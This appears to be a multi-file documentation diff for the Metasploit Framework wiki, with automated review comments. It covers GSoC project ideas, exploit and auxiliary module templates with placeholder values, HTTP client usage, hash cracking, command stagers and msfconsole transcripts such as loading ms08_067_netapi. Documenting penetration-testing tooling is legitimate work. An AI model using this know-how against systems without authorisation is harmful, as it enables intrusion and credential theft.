Metasploit's LDAP service mixin provides a service to enable interaction over the LDAP protocol. The current implementation is the bare minimum to enable support for attacking the [2021 Log4Shell vulnerability](). Enhancement/Extension of the mixin to enable various additional LDAP features would enable extended usage of this service for additional tasks. Support for various protocol level authentication methods would allow Metasploit to intercept and log authentication information. Specific items of interest are [SPNEGO](https://en.wikipedia.org/wiki/SPNEGO) and [StartTLS](https://ldapwiki.com/wiki/StartTLS) support to enable compatibility with the widest variety of clients and a new capture module that log authentication information from clients.
Size: Medium
Difficulty: 3/5
### Enhanced LDAP Query & Collection
When preforming security assessment on a network with centralized login such as LDAP or Active Directory these services are sometimes exposed directly on the network. While Metasploit has capabilities to collect various pieces of information from these services when a user has been able to gain code execution inside a target system by utilizing tooling such as `Sharphound` or by leveraging SMB services via the `secrets_dump` module, these methods are somewhat indirect. A network base capability to query exposed services may have value. An interactive terminal plugin allowing users to connect directly to LDAP or Active Directory providing capabilities similar to the existing `requests` plugin could enable users search for valuable information in these services without the need to compromise a target or interact with a secondary service.
Size: Medium/Large (Depends on proposal)
Difficulty: 3/5
### Improving post-exploit API to be more consistent, work smoothly across session types
The Metasploit post-exploitation API is intended to provide a unified interface between different Meterpreter, shell, PowerShell, mainframe, and other session types. However, there are areas where the implementation is not consistent, and could use improvements:
* Shell sessions do not implement the filesystem API that Meterpreter sessions have
* When a shell session is in a different language, e.g. Windows in French, the post API does not find the expected output. Add localization support for these.
* Simple commands like 'cmd_exec' are fast in Shell sessions but are relatively slow in Meterpreter sessions. Add an API to make Meterpreter run simple commands more easily.
Size: Medium/Large (Depends on proposal)
Difficulty: Varies
### Improve the web vulnerability API
This would follow up on the Arachni plugin PR <https://github.com/rapid7/metasploit-framework/pull/8618> and improve the Metasploit data model to better represent modern web vulnerabilities. This project would require knowledge of data models, types of modern web vulnerabilities, and experience with web app security scanners.
Size: Large
Difficulty: 4/5
### Data Visualization
Enhance existing Metasploit Goliath dashboard that allows observation of an active engagement. Data visualization would include, but not be limited to: host node graph with activity indicators and heat maps. The main idea here is to create a visualization tool that helps users understand data that has been gathered into Metasploit during usage in some useful way. Proposals should note where the service will live, how a user will use the service, and how you will provide a maintainable and extendable consumer for the data that is exposed.
See [Metasploit 'Goliath' Demo (msf-red)](https://www.youtube.com/watch?v=hvuy6A-ie1g&feature=youtu.be&t=176) for a demo video of Goliath in action. You can also read more on Metasploit Goliath at [Metasploit-Data-Service-Enhancements-(Goliath)](./Metasploit-Data-Service-Enhancements-Goliath)
Size: Medium/Large (Depends on proposal)
Difficulty 3/5
## Submit your own
If you want to suggest your own idea, please discuss it with us first on [Slack](https://metasploit.com/slack) in the `#gsoc` channel to make sure it is a reasonable amount of work for a summer and that it fits the goals of the project.
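Review bot: the Log4Shell reference in the LDAP Capture Capabilities section is an empty link, `[2021 Log4Shell vulnerability]()`, and renders as a dead anchor; fill in the target or drop the brackets. Spelling and grammar in the same new file: "RCP commands" should be "RPC commands", "preforming" should be "performing", "A network base capability" should be "A network-based capability", "a new capture module that log authentication information" should be "logs", "could enable users search" should be "could enable users to search", and the last idea's "Difficulty 3/5" is missing the colon the other entries use.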
@@ -27,9 +27,9 @@ The Metasploit Framework has seven different rankings to indicate how reliable a
## Template
If you have read this far, we think you are pretty impressive because it's a lot to digest. You are probably wondering why we haven't had a single line of code to share in the writeup. Well, as you recall, exploit development is mostly about your reversing skills. If you have all that, we shouldn't be telling you how to write an exploit. What we've done so far is hopefully get your mindset dialed-in correctly about what it means to become a Metasploit exploit developer for the security community; the rest is more about how to use our mixins to build that exploit. Well, there are A LOT of mixins, so it's impossible to go over all of them in a single page, so you must either read the [API documentation](https://rapid7.github.io/metasploit-framework/api/), existing [code examples](https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits), or look for more wiki pages we've written to cover specific mixins.
If you have read this far, we think you are pretty impressive because it's a lot to digest. You are probably wondering why we haven't had a single line of code to share in the writeup. Well, as you recall, exploit development is mostly about your reversing skills. If you have all that, we shouldn't be telling you how to write an exploit. What we've done so far is hopefully get your mindset dialed-in correctly about what it means to become a Metasploit exploit developer for the security community; the rest is more about how to use our mixins to build that exploit. Well, there are A LOT of mixins, so it's impossible to go over all of them in a single page, so you must either read the [API documentation](https://docs.metasploit.com/api/), existing [code examples](https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits), or look for more wiki pages we've written to cover specific mixins.
For example, if you're looking for a writeup about how to interact with an HTTP server, you might be interested in: [How to send an HTTP Request Using HTTPClient](https://github.com/rapid7/metasploit-framework/wiki/How-to-Send-an-HTTP-Request-Using-HTTPClient). If you're interested in browser exploit writing, definitely check out: [How to write a browser exploit using BrowserExploitServer](https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-browser-exploit-using-BrowserExploitServer), etc.
For example, if you're looking for a writeup about how to interact with an HTTP server, you might be interested in: [[How to send an HTTP Request Using HTTPClient|./How-to-write-a-browser-exploit-using-HttpServer.md]]. If you're interested in browser exploit writing, definitely check out: [[How to write a browser exploit using BrowserExploitServer|./How-to-write-a-browser-exploit-using-BrowserExploitServer.md]], etc.
But of course, to begin, you most likely need a template to work with, and here it is. We'll also explain how to fill out the required fields:
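Review bot: the rewritten HTTPClient link points at the wrong page. The link text still says "How to send an HTTP Request Using HTTPClient", but the new target is `./How-to-write-a-browser-exploit-using-HttpServer.md`, whereas the removed line pointed at `How-to-Send-an-HTTP-Request-Using-HTTPClient`; the target should be the HTTPClient page.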
@@ -39,39 +39,39 @@ But of course, to begin, you most likely need a template to work with, and here
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
def initialize(info={})
super(update_info(info,
'Name' => "[Vendor] [Software] [Root Cause] [Vulnerability type]",
'Description' => %q{
Say something that the user might need to know
},
'License' => MSF_LICENSE,
'Author' => [ 'Name' ],
'References' =>
[
def initialize(info = {})
super(
update_info(
info,
'Name' => '[Vendor] [Software] [Root Cause] [Vulnerability type]',
'Description' => %q{
Say something that the user might need to know
},
'License' => MSF_LICENSE,
'Author' => [ 'Name' ],
'References' => [
[ 'URL', '' ]
],
'Platform' => 'win',
'Targets' =>
[
[ 'System or software version',
'Platform' => 'win',
'Targets' => [
[
'System or software version',
{
'Ret' => 0x41414141 # This will be available in `target.ret`
}
]
],
'Payload' =>
{
'Payload' => {
'BadChars' => "\x00"
},
'Privileged' => false,
'DisclosureDate' => "",
'DefaultTarget' => 0))
'Privileged' => false,
'DisclosureDate' => '',
'DefaultTarget' => 0
)
)
end
def check
@@ -289,7 +289,7 @@ end
msfconsole output:
```
```msf
msf6 exploit(windows/smb/msf_smb_client_test) > options
Module options (exploit/windows/smb/msf_smb_client_test):
@@ -406,7 +406,7 @@ end
msfconsole output:
```
```msf
msf6 exploit(windows/smb/ruby_smb_client_test) > options
Module options (exploit/windows/smb/ruby_smb_client_test):
@@ -1,6 +1,6 @@
# Intro
This article will discuss the various libraries, dependencies, and functionality built in to metasploit for dealing with password hashes, and cracking them. In general, this will not cover storing credentials in the database, which can be read about [here](https://github.com/rapid7/metasploit-framework/wiki/Creating-Metasploit-Framework-LoginScanners#the-scan-block). Metasploit currently support cracking passwords with [John the Ripper](https://github.com/rapid7/metasploit-framework/tree/master/modules/auxiliary/analyze) and [hashcat](https://github.com/rapid7/metasploit-framework/pull/11695).
This article will discuss the various libraries, dependencies, and functionality built in to metasploit for dealing with password hashes, and cracking them. In general, this will not cover storing credentials in the database, which can be read about [[here|./Creating-Metasploit-Framework-LoginScanners.md]]. Metasploit currently support cracking passwords with [John the Ripper](https://github.com/rapid7/metasploit-framework/tree/master/modules/auxiliary/analyze) and [hashcat](https://github.com/rapid7/metasploit-framework/pull/11695).
# Hashes
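Review bot: in the retained sentence, "Metasploit currently support cracking passwords" should be "supports", and "built in to metasploit" should be "built into Metasploit". The hashcat reference also links to a pull request rather than to the modules directory used for the John the Ripper link; pointing both at the same place would age better.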
@@ -9,7 +9,7 @@ Many modules dump hashes from various software. Anything from the OS: [Windows]
## Hash Identify Example
In this first, simple, example we will simply show loading the library and calling its function.
```
```ruby
require 'metasploit/framework/hashes/identify'
puts identify_hash "$1$28772684$iEwNOgGugqO9.bIz5sk8k/"
# note, bad hashes return an empty string since nil is not accepted when creating credentials in msf.
@@ -17,7 +17,7 @@ puts identify_hash "This_is a Fake Hash"
puts identify_hash "_9G..8147mpcfKT8g0U."
```
In practice, we receive the following output from this:
```
```ruby
msf5 > irb
[*] Starting IRB shell...
[*] You are in the "framework" object
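Review bot: the new fence tags the transcript as ```ruby, but the block is msfconsole/IRB output (`msf5 > irb`, `[*] Starting IRB shell...`), not Ruby source; the other hunks in this change tag such transcripts ```msf, so use that here for consistency (the preceding hunk's `identify_hash` snippet is correctly tagged ```ruby).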
@@ -1,8 +1,8 @@
Welcome to Metasploit-land. Are you a Metasploit user who wants to get started or get better at hacking stuff (that you have permission to hack)? The quickest way to get started is to [download the Metasploit nightly installers](https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers). This will give you access to both the free, open-source Metasploit Framework and a free trial of Metasploit Pro.
Welcome to Metasploit-land. Are you a Metasploit user who wants to get started or get better at hacking stuff (that you have permission to hack)? The quickest way to get started is to [[download the Metasploit nightly installers|./Nightly-Installers.md]]. This will give you access to both the free, open-source Metasploit Framework and a free trial of Metasploit Pro.
If you're using [Kali Linux](https://kali.org/), Metasploit is already pre-installed. See the [Kali documentation](https://kali.org/docs/tools/starting-metasploit-framework-in-kali/) for how to get started using Metasploit in Kali Linux.
Are you anxious to get your [Metasploit Development Environment](https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment) set up so you can start [[Landing Pull Requests]] and contributing excellent exploit code? If so, you're in the right place. If you're an exploit developer, you will want to review our [[Guidelines for Accepting Modules and Enhancements]] to find out what we expect when we see pull requests for new Metasploit modules. No idea what you should start working on? Check out the guidelines for [[contributing to Metasploit]], and dive into [[Setting Up a Metasploit Development Environment]].
Are you anxious to get your [[Metasploit Development Environment|./dev/Setting-Up-a-Metasploit-Development-Environment.md]] set up so you can start [[Landing Pull Requests]] and contributing excellent exploit code? If so, you're in the right place. If you're an exploit developer, you will want to review our [[Guidelines for Accepting Modules and Enhancements]] to find out what we expect when we see pull requests for new Metasploit modules. No idea what you should start working on? Check out the guidelines for [[contributing to Metasploit]], and dive into [[Setting Up a Metasploit Development Environment]].
# Getting Started #
@@ -7,7 +7,7 @@ An updated list of the application timeline can be found at https://developers.g
## Important Dates
- GSoC Applications Open: April 4th at 1800 UTC
- GSoC Applications Open: April 4th at 1800 UTC
- GSoC Applications Close: April 19th at 1800 UTC for 2022 GSoC applications. **No late submissions will be accepted, period.**
- Accepted applications announced: May 20th at 1800 UTC
- Programming Starts: June 13th.
@@ -19,14 +19,14 @@ An updated list of the application timeline can be found at https://developers.g
You can find the current list of GSoC ideas at [[GSoC-2022-Project-Ideas]]. Please see the note at the bottom of this page if you are interested in submitting your own idea, as this will require approval.
# Getting started
Students interesting in GSoC, can start by reading Google's official guides.
Students interesting in GSoC, can start by reading Google's official guides.
<https://developers.google.com/open-source/gsoc/help/student-advice>
Review all of the [student guide](https://google.github.io/gsocguides/student/) and carefully read the [proposal writing section](https://google.github.io/gsocguides/student/writing-a-proposal.html).
A listed `idea` is a seed for GSoC students to expand on and propose how to design and implement a solution. You can start by investigating the code base and how existing users interaction with `msfconsole` functionality. Think through scenarios on how a user might want to interact with the proposed idea.
A place to get started with contributing to Metasploit is [here](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md) and expanded on [here](https://github.com/rapid7/metasploit-framework/wiki/Contributing-to-Metasploit#framework-bugs-and-features).
A place to get started with contributing to Metasploit is [here](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md) and expanded on [[here|./Contributing-to-Metasploit.md]].
GSoC mentors tend to look for those items that have a chance of making development and usage easier or improving the overall performance of a certain area, however by starting with understanding the most common contribution pattern you can get familiar with the codebase and also the mindset of users. This will help you in creating a proposal with the end user in mind.
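Review bot: the line "Students interesting in GSoC, can start by reading Google's official guides." is rewritten here with the same text, so fix it while it is touched: "Students interested in GSoC can start by reading Google's official guides." The nearby context line "how existing users interaction with msfconsole functionality" reads better as "how existing users interact with msfconsole functionality".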
@@ -50,14 +50,14 @@ A brief description of what you would like to work on. See [[GSoC-2022-Project-I
## Skillz
What programming languages are you familiar with, in order of proficiency? Most of Metasploit is written in Ruby; for any project you will most likely need at least a passing knowledge of it. If you want to work on Meterpreter or Mettle, C will be necessary as well.
What programming languages are you familiar with, in order of proficiency? Most of Metasploit is written in Ruby; for any project you will most likely need at least a passing knowledge of it. If you want to work on Meterpreter or Mettle, C will be necessary as well.
What other projects have you worked on before?
## Your project
Fill in the details. What exactly do you want to accomplish?
Fill in the details. What exactly do you want to accomplish?
# Past Submissions
If you are interested in looking at past accepted submissions and projects, you can find them at https://summerofcode.withgoogle.com/archive, and clicking on any year from 2017 onwards (with the exception of 2019 as Metasploit did not participate this year). Then click on the `Security` tag, and search for `Metasploit`. Scroll down to the bottom and you will see past successful applications and the associated code for each successful submission. Submissions from 2020 onwards also include copies of the proposal that was sent in by the accepted contributor.
@@ -1,16 +1,16 @@
The [HttpClient mixin](https://rapid7.github.io/metasploit-framework/api/Msf/Exploit/Remote/HttpClient) can be included with an exploit module in order to facilitate easier HTTP communications with a target machine.
The [HttpClient mixin](https://docs.metasploit.com/api/Msf/Exploit/Remote/HttpClient) can be included with an exploit module in order to facilitate easier HTTP communications with a target machine.
## There are mainly two common methods you will see:
* **[send\_request\_raw](https://rapid7.github.io/metasploit-framework/api/Msf/Exploit/Remote/HttpClient.html#send_request_raw-instance_method)** - You use this to send a raw HTTP request. Usually, you will want this method if you need something that violates the specification; in most other cases, you should prefer `send_request_cgi`. If you wish to learn about how this method works, look at the documentation for [`Rex::Proto::Http::Client#request_raw`](https://rapid7.github.io/metasploit-framework/api/Rex/Proto/Http/Client.html#request_raw-instance_method).
* **[send\_request\_raw](https://docs.metasploit.com/api/Msf/Exploit/Remote/HttpClient.html#send_request_raw-instance_method)** - You use this to send a raw HTTP request. Usually, you will want this method if you need something that violates the specification; in most other cases, you should prefer `send_request_cgi`. If you wish to learn about how this method works, look at the documentation for [`Rex::Proto::Http::Client#request_raw`](https://docs.metasploit.com/api/Rex/Proto/Http/Client.html#request_raw-instance_method).
Here's a basic example of how to use `send_request_raw`:
```ruby
send_request_raw({'uri'=>'/index.php'})
```
* **[send\_request\_cgi](https://rapid7.github.io/metasploit-framework/api/Msf/Exploit/Remote/HttpClient.html#send_request_cgi-instance_method)** - You use this to send a more CGI-compatible HTTP request. If your request contains a query string (or POST data), then you should use this. If you wish to learn about how this method works, check out [`Rex::Proto::Http::Client#request_cgi`](https://rapid7.github.io/metasploit-framework/api/Rex/Proto/Http/Client.html#request_cgi-instance_method).
* **[send\_request\_cgi](https://docs.metasploit.com/api/Msf/Exploit/Remote/HttpClient.html#send_request_cgi-instance_method)** - You use this to send a more CGI-compatible HTTP request. If your request contains a query string (or POST data), then you should use this. If you wish to learn about how this method works, check out [`Rex::Proto::Http::Client#request_cgi`](https://docs.metasploit.com/api/Rex/Proto/Http/Client.html#request_cgi-instance_method).
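Review bot: the migrated mixin link `https://docs.metasploit.com/api/Msf/Exploit/Remote/HttpClient` has no `.html` suffix while the two method links in the same hunk use `HttpClient.html#...`; pick one form so all three resolve on the new host, and check that docs.metasploit.com serves the same YARD output so the `#send_request_raw-instance_method` and `#request_cgi-instance_method` fragments still land on the methods.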
@@ -31,7 +31,7 @@ send_request_cgi({
## Cookies & CookieJars
Part of send\_request\_cgi functionality is the ability to collect, edit, and send cookies via the HttpClient's `cookie_jar` variable, an instance of the [HttpCookieJar](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/remote/http/http_cookie_jar.rb) class.
Part of send\_request\_cgi functionality is the ability to collect, edit, and send cookies via the HttpClient's `cookie_jar` variable, an instance of the [HttpCookieJar](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/remote/http/http_cookie_jar.rb) class.
A HttpCookieJar is a collection of [HttpCookie](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/remote/http/http_cookie.rb). The Jar can be populated manually with it's `add` method, or automatically via the `keep_cookies` option that can be passed to [send\_request\_cgi](https://github.com/rapid7/metasploit-framework/blob/92d981fff2b4a40324969fd1d1744219589b5fa3/lib/msf/core/exploit/remote/http_client.rb#L385).
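Review bot: the changed "Part of send_request_cgi functionality..." line is identical before and after as rendered (whitespace only); since this spot is touched anyway, the following sentence "The Jar can be populated manually with it's add method" should use "its", and "A HttpCookieJar" reads better as "An HttpCookieJar".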
@@ -59,7 +59,7 @@ res = @http_client.send_request_cgi({
}
})
```
The cookies returned by the server with a successful login need to be attached to all future requests, so `'keep_cookies' => true,` is used to add all returned cookies to the HttpClient CookieJar and attach them to all subsequent requests.
The cookies returned by the server with a successful login need to be attached to all future requests, so `'keep_cookies' => true,` is used to add all returned cookies to the HttpClient CookieJar and attach them to all subsequent requests.
### `cookie` option
Shown below is the request used to login to a gitlab account in the [artical\_proxy\_auth\_bypass\_service\_cmds\_peform\_command\_injection module](https://github.com/rapid7/metasploit-framework/blob/92d981fff2b4a40324969fd1d1744219589b5fa3/modules/exploits/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.rb#L115)
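Review bot: the context line after this whitespace-only rewrite says the request is used "to login to a gitlab account" but links the artica_proxy_auth_bypass module, and the link text spells it "artical_proxy" while the path says "artica_proxy"; fix the product name and the link text in the same pass ("log in to" rather than "login to" as well), and the sentence is missing its final period.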
@@ -136,7 +136,7 @@ register_options(
)
```
**2** - Load your TARGETURI with [`target_uri`](https://rapid7.github.io/metasploit-framework/api/Msf/Exploit/Remote/HttpClient.html#target_uri-instance_method), that way the URI input validation will kick in, and then you get a real `URI` object:
**2** - Load your TARGETURI with [`target_uri`](https://docs.metasploit.com/api/Msf/Exploit/Remote/HttpClient.html#target_uri-instance_method), that way the URI input validation will kick in, and then you get a real `URI` object:
In this example, we'll just load the path:
@@ -144,7 +144,7 @@ In this example, we'll just load the path:
uri = target_uri.path
```
**3** - When you want to join another URI, always use [`normalize_uri`](https://rapid7.github.io/metasploit-framework/api/Msf/Exploit/Remote/HttpClient.html#normalize_uri-instance_method):
**3** - When you want to join another URI, always use [`normalize_uri`](https://docs.metasploit.com/api/Msf/Exploit/Remote/HttpClient.html#normalize_uri-instance_method):
Example:
@@ -164,8 +164,6 @@ Please note: The `normalize_uri` method will always follow these rules:
## Full Example
```ruby
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
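Review bot: dropping `require 'msf/core'` from the Full Example is consistent with the other templates in this change (the deprecated-module, auxiliary, scanner and login-scanner examples lose it too), but nothing in the surrounding text explains that the framework loader supplies it; one sentence saying modules no longer need the require would stop readers from re-adding it when they copy the template.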
@@ -38,7 +38,7 @@ register_options(
### Fixed filename
Occasionally, you might not want your user to change the filename at all. A lazy trick to do that is by modifying the ```FILENAME``` datastore option at runtime, but this is very much not recommended. In fact, if you do this, you will not pass [msftidy](https://github.com/rapid7/metasploit-framework/wiki/Guidelines-for-Accepting-Modules-and-Enhancements#module-additions). Instead, here's how it's done properly:
Occasionally, you might not want your user to change the filename at all. A lazy trick to do that is by modifying the ```FILENAME``` datastore option at runtime, but this is very much not recommended. In fact, if you do this, you will not pass [[msftidy|./Guidelines-for-Accepting-Modules-and-Enhancements.md]]. Instead, here's how it's done properly:
1 - Deregister the ```FILENAME``` option
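Review bot: inline code on the rewritten line wraps FILENAME in triple backticks while the rest of the file uses single backticks for inline identifiers; since the line is already being edited for the `[[msftidy|...]]` link, normalise it here and on the "1 - Deregister the FILENAME option" line that follows.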
@@ -35,7 +35,7 @@ DEPRECATION_REPLACEMENT = 'exploit/linux/http/dlink_upnp_exec_noauth'
When the user loads that module, they should see a warning like this:
```
```msf
msf > use exploit/windows/misc/test
[!] ************************************************************************
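Review bot: the fence language changes from none to `msf`, and the same switch is applied to the oracle, irb, LogLevel, ms08_067 and datastore transcripts later in this change; confirm the docs renderer has an `msf` lexer registered, otherwise these blocks silently fall back to plain text, which is what they were before and not an improvement.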
@@ -48,8 +48,6 @@ msf > use exploit/windows/misc/test
## Code example
```ruby
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
@@ -58,23 +56,26 @@ class MetasploitModule < Msf::Exploit::Remote
deprecated(Date.new(2014, 9, 21), 'exploit/linux/http/dlink_upnp_exec_noauth')
def initialize(info = {})
super(update_info(info,
'Name' => 'Msf::Module::Deprecated Example',
'Description' => %q{
This shows how to use Msf::Module::Deprecated.
},
'Author' => [ 'sinn3r' ],
'License' => MSF_LICENSE,
'References' => [ [ 'URL', 'http://metasploit.com' ] ],
'DisclosureDate' => 'Apr 01 2014',
'Targets' => [ [ 'Automatic', { } ] ],
'DefaultTarget' => 0
))
super(
update_info(
info,
'Name' => 'Msf::Module::Deprecated Example',
'Description' => %q{
This shows how to use Msf::Module::Deprecated.
},
'Author' => [ 'sinn3r' ],
'License' => MSF_LICENSE,
'References' => [ [ 'URL', 'http://metasploit.com' ] ],
'DisclosureDate' => '2014-04-01',
'Targets' => [ [ 'Automatic', {} ] ],
'DefaultTarget' => 0
)
)
end
def exploit
print_debug("Code example")
print_debug('Code example')
end
end
```
```
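Review bot: besides the layout change, `'DisclosureDate'` moves from `'Apr 01 2014'` to `'2014-04-01'`, which is a metadata content change and deserves a mention in the commit message rather than riding along with the rubocop reformat; the `Date.new(2014, 9, 21)` argument to `deprecated` in the context line is a Ruby Date, not a metadata string, so it is right to leave it alone. The doubled closing fence at the end of the hunk is the old and new rendering of one line (whitespace only).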
@@ -2,7 +2,7 @@ This is an update of the original blog post about how to get Oracle support work
Due to licensing issues, we cannot ship Oracle's proprietary client access libraries by default. As a result, you may see this error when running a Metasploit module:
```
```msf
msf auxiliary(oracle_login) > run
[-] Failed to load the OCI library: cannot load such file -- oci8
@@ -11,7 +11,7 @@ msf auxiliary(oracle_login) > run
msf auxiliary(oracle_login) > run
```
or
```
```msf
msf5 auxiliary(scanner/oracle/oracle_hashdump) > run
[-] Failed to load the OCI library: cannot load such file -- oci8
@@ -159,4 +159,4 @@ install oci8.rb /opt/metasploit/ruby/lib/ruby/site_ruby/2.5.0/
[...]
<--- ext
root@kali:~/ruby-oci8-ruby-oci8-2.2.7#
```
```
@@ -2,4 +2,4 @@
I tricked you. We don't let anybody write Meterpreter scripts anymore, therefore we will no longer teach you how.
[You should try writing post modules instead](https://github.com/rapid7/metasploit-framework/wiki/How-to-get-started-with-writing-a-post-module).
[[You should try writing post modules instead|./How-to-get-started-with-writing-a-post-module.md]].
@@ -32,7 +32,7 @@ So you know how in Lord of the Rings, people are totally obsessed with the One R
You can use the ```session``` method to access the session object, or its alias ```client```. The best way to interact with one is via irb, here's an example of how:
```
```msf
msf exploit(handler) > run
[*] Started reverse handler on 192.168.1.64:4444
@@ -53,19 +53,20 @@ Here's the most basic example of an auxiliary module. We'll explain a bit more a
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
def initialize(info = {})
super(update_info(info,
'Name' => 'Module name',
'Description' => %q{
Say something that the user might want to know.
},
'Author' => [ 'Name' ],
'License' => MSF_LICENSE
))
super(
update_info(
info,
'Name' => 'Module name',
'Description' => %q{
Say something that the user might want to know.
},
'Author' => [ 'Name' ],
'License' => MSF_LICENSE
)
)
end
def run
@@ -89,21 +90,22 @@ Because the ```Msf::Auxiliary::Scanner``` mixin is so popular, we figured you wa
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'Module name',
'Description' => %q{
Say something that the user might want to know.
},
'Author' => [ 'Name' ],
'License' => MSF_LICENSE
))
super(
update_info(
info,
'Name' => 'Module name',
'Description' => %q{
Say something that the user might want to know.
},
'Author' => [ 'Name' ],
'License' => MSF_LICENSE
)
)
end
def run_host(ip)
@@ -15,7 +15,7 @@ msf > irb
By default, all the log errors are on level 0 - the least informative level. But of course, you can change this by setting the datastore option, like this:
```
```msf
msf > setg LogLevel 3
LogLevel => 3
msf >
@@ -1,9 +1,9 @@
**Note: This documentation may need to be vetted.**
# How to send an HTTP request using Rex::Proto::Http::Client
The Rex library (Ruby Extension Library) is the most fundamental piece of the Metasploit Framework architecture. Modules normally do not interact with Rex directly, instead they depend on the framework core and its mixins for better code sharing. If you are a Metasploit module developer, the [lib/msf/core](https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/core) directory should be more than enough for most of your needs. If you are writing a module that speaks HTTP, then the [Msf::Exploit::Remote::HttpClient](https://github.com/rapid7/metasploit-framework/wiki/How-to-Send-an-HTTP-Request-Using-HTTPClient) mixin (which is found in [lib/msf/core/exploit/http/client](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/http/client.rb)) is most likely the one you want.
The Rex library (Ruby Extension Library) is the most fundamental piece of the Metasploit Framework architecture. Modules normally do not interact with Rex directly, instead they depend on the framework core and its mixins for better code sharing. If you are a Metasploit module developer, the [lib/msf/core](https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/core) directory should be more than enough for most of your needs. If you are writing a module that speaks HTTP, then the [[Msf::Exploit::Remote::HttpClient|./How-to-Send-an-HTTP-Request-Using-HttpClient.md]] mixin (which is found in [lib/msf/core/exploit/http/client](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/http/client.rb)) is most likely the one you want.
However, in some scenarios, you actually can't use the HttpClient mixin. The most common is actually when writing a form-based login module using the [LoginScanner API](https://github.com/rapid7/metasploit-framework/wiki/Creating-Metasploit-Framework-LoginScanners). If you find yourself in that situation, use [Rex::Proto::Http::Client](https://github.com/rapid7/metasploit-framework/blob/master/lib/rex/proto/http/client.rb).
However, in some scenarios, you actually can't use the HttpClient mixin. The most common is actually when writing a form-based login module using the [[LoginScanner API|./Creating-Metasploit-Framework-LoginScanners.md]]. If you find yourself in that situation, use [Rex::Proto::Http::Client](https://github.com/rapid7/metasploit-framework/blob/master/lib/rex/proto/http/client.rb).
## Initializing Rex::Proto::Http::Client
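Review bot: the new wiki link targets `./How-to-Send-an-HTTP-Request-Using-HttpClient.md` (mixed-case `HttpClient`) while the old URL slug was `...-Using-HTTPClient`; confirm the file exists with exactly that casing, since these relative links are case-sensitive on Linux. The unchanged tail of the line also says the mixin lives in `lib/msf/core/exploit/http/client.rb`, whereas the cookie-jar hunk earlier in this same change links it at `lib/msf/core/exploit/remote/http_client.rb`; one of the two paths is stale.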
@@ -1,5 +1,5 @@
# How to use Msf::Auxiliary::AuthBrute to write a bruteforcer
The ```Msf::Auxiliary::AuthBrute``` mixin should no longer be used to write a login module, you should try our [LoginScanner API](https://github.com/rapid7/metasploit-framework/wiki/Creating-Metasploit-Framework-LoginScanners) instead. However, some of the datastore options are still needed, so let's go over them right quick.
The ```Msf::Auxiliary::AuthBrute``` mixin should no longer be used to write a login module, you should try our [[LoginScanner API|./Creating-Metasploit-Framework-LoginScanners.md]] instead. However, some of the datastore options are still needed, so let's go over them right quick.
### Regular options
@@ -53,6 +53,6 @@ Check out the other advanced options in the API documentation below.
### References
- <https://rapid7.github.io/metasploit-framework/api/Msf/Exploit/Powershell.html>
- <https://docs.metasploit.com/api/Msf/Exploit/Powershell.html>
- <https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/powershell.rb>
- <https://github.com/rapid7/metasploit-framework/blob/master/data/exploits/powershell/powerdump.ps1>
@@ -6,7 +6,7 @@ In this documentation, understand that we require you no exploit development kno
Each Metasploit module comes with some metadata that explains what it's about, and to see that you must load it first. An example:
```
```msf
msf > use exploit/windows/smb/ms08_067_netapi
```
@@ -24,7 +24,7 @@ This may sound surprising, but sometimes we get asked questions that are already
You can use the info command to see the module's description:
```
```msf
msf exploit(ms08_067_netapi) > info
```
@@ -36,13 +36,13 @@ If the exploit supports automatic targeting, it is always the first item on the
The "show options" command will tell you which target is selected. For example:
```
```msf
msf exploit(ms08_067_netapi) > show options
```
The "show targets" command will give you a list of targets supported:
```
```msf
msf exploit(ms08_067_netapi) > show targets
```
@@ -50,13 +50,13 @@ msf exploit(ms08_067_netapi) > show targets
All Metasploit modules come with most datastore options pre-configured. However, they may not be suitable for the particular setup you're testing. To do a quick double-check, usually the "show options" command is enough:
```
```msf
msf exploit(ms08_067_netapi) > show options
```
However, "show options" only shows you all the basic options. It does not show you the evasive or advanced options (try "show evasion" and "show advanced"), the command you should use that shows you all the datastore options is actually the "set" command:
```
```msf
msf exploit(ms08_067_netapi) > set
```
@@ -1,4 +1,6 @@
Command stagers provide an easy way to write exploits against typical vulnerabilities such as [command execution](https://www.owasp.org/index.php/Command_Injection) or [code injection](https://www.owasp.org/index.php/Code_Injection). There are currently 14 different flavors of command stagers, each uses system command (or commands) to save your payload, sometimes decode, and execute.
If youve found a way to execute a command on a target, and youd like the leverage that ability to execute a command into a meterpreter session, command stagers are for you. Command stagers provide an easy way to write exploits that leverage vulnerabilities such as [command execution](https://www.owasp.org/index.php/Command_Injection) or [code injection](https://www.owasp.org/index.php/Code_Injection) and turn them into sessions. There are currently 14 different flavors of command stagers, each uses system command (or commands) to save (or not save) your payload, sometimes decode, and execute.
The hardest part about command stagers is understanding how much they do. All you need to do for a command stager is to define how the command injection works in the `execute_command` method and then select a few options.
# The Vulnerability Test Case
